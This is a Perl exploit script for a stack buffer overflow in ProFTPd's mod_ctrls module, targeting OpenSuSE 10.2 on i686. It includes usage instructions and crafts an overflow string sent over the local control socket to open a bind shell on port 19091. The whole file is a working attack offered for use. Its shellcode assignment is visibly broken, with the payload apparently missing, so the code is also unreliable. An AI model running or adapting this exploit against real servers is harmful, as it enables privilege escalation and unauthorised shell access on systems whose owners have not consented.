#!/usr/bin/perl -w
# Exploit for the ProFTPd mod_ctrls vulnerability.
# Stack Overflow in function
# int pr_ctrls_recv_request(pr_crls_cl_t *cl)
# unchecked buffer for arguments of the module
# connects to the unix domain socket and sends a string
# that is longer than the buffer (char[512]).
# Cheers to Alfredo "revenge" Pesoli for the implementation
# on Ubuntu and Debian Etch
# works on OpenSuSE 10.2 on i686
# http://www.devtarget.org
# Michael Domberg
# Usage: $ /usr/bin/perl proftpd-mod_ctrls-opensuse10_2.pl /path/to/local/socket
# Example (on OpenSuSE 10.2):
# $ /usr/bin/perl proftpd-mod_ctrls-opensuse10_2.pl /usr/local/var/proftpd/proftpd.sock
use strict;
use Socket;
# bind on port 19091
my $shell =
print "[+] Preparing attack string...\n";
my $rsock = shift;
my $buf = "A"x520;
use constant TEMPSOCK => '/tmp/tmp.sock';
$buf = $buf."\0\0\x0a\xff"."AAAAaaaaAAAAaaaa"."\x77\xe7\xff\xff".$shell;
my $l = length($buf);
print "[+] Opening Unix Domain Socket to mod_ctrls \n";
socket (SOCK, PF_UNIX, SOCK_STREAM, 0) or die "[-] Socket creation failed : $!";
my $rfile = sockaddr_un($rsock);
unlink TEMPSOCK;
my $lfile = sockaddr_un(TEMPSOCK);
bind (SOCK, $lfile) or die "[-] Creation of Unix Domain Socket failed. ($lfile)";
chmod (00700, TEMPSOCK);
connect (SOCK, $rfile) or die "\n [-] Connection to control socket failed.\n\n";
print "[+] Sending attack...\n";
send SOCK, pack("s2", 0),0;
send SOCK, pack("s2", 1,0),0;
send SOCK, pack("C", 188).pack("C",2).pack("s1",0),0;
send SOCK, $buf,0;
close SOCK;
print "\n [+] Attack String sent. Try to connect to Port 19091\n\n";